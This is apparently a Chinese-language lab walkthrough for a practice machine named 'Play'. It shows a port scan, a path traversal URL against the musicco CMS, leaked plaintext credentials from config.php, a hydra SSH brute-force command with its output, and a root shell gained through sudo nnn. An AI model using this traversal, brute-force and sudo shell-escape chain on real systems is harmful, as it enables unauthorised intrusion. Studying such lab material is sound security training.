# 靶场搭建
下载:Play
Nat,IP: 192.168.1.134
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) |
扫描目录拿到 playlist 目录
没有什么功能点,再扫一下这个目录,拿到 README
得知 CMS 为 musicco ,搜一下漏洞,得到文件下载
目录穿越一下: http://192.168.1.134/playlist//?getAlbum&parent=../../&album=Efe
下载到压缩包
在 config.php 中得到三组账号密码
<?php | |
$_CONFIG['saveConfig'] = ''; | |
$_CONFIG['users'] = array( | |
array('admin', 'admin', 'true'), | |
array('guest', 'guest', 'false'), | |
array('unknown', 'iL0v3Mu$1c', 'false'), | |
); | |
$_CONFIG['lang'] = 'en'; | |
$_CONFIG['musicRoot'] = 'music'; | |
$_CONFIG['coverFileName'] = 'folder'; | |
$_CONFIG['coverExtension'] = '.png'; | |
$_CONFIG['loadLyricsFromFile'] = 'on'; | |
$_CONFIG['lookUpLyrics'] = 'on'; | |
$_CONFIG['downLoadMissingCovers'] = 'on'; | |
$_CONFIG['searchEngine'] = ''; | |
$_CONFIG['imageSearchEngine'] = ''; | |
?> |
看到最后一个密码是: iL0v3Mu$1c ,那说明什么,要去爆破用户
上 hydra!
┌──(root㉿kali)-[~/Desktop/html/playlist] | |
└─# hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 'iL0v3Mu$1c' 192.168.1.134 ssh -t 64 -I | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-22 03:36:16 | |
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 | |
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10177 login tries (l:10177/p:1), ~160 tries per task | |
[DATA] attacking ssh://192.168.1.134:22/ | |
[STATUS] 475.00 tries/min, 475 tries in 00:01h, 9743 to do in 00:21h, 23 active | |
[22][ssh] host: 192.168.1.134 login: andy password: iL0v3Mu$1c | |
[STATUS] 335.00 tries/min, 1005 tries in 00:03h, 9225 to do in 00:28h, 11 active | |
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session. |
拿到用户 andy
# 提权
sudo -l 发现有个 nnn
不知道什么东西,打开瞎 J8 乱按发现按 e 能进行编辑,看上去像 vi
直接 :!/bin/bash
拿到 root 权限
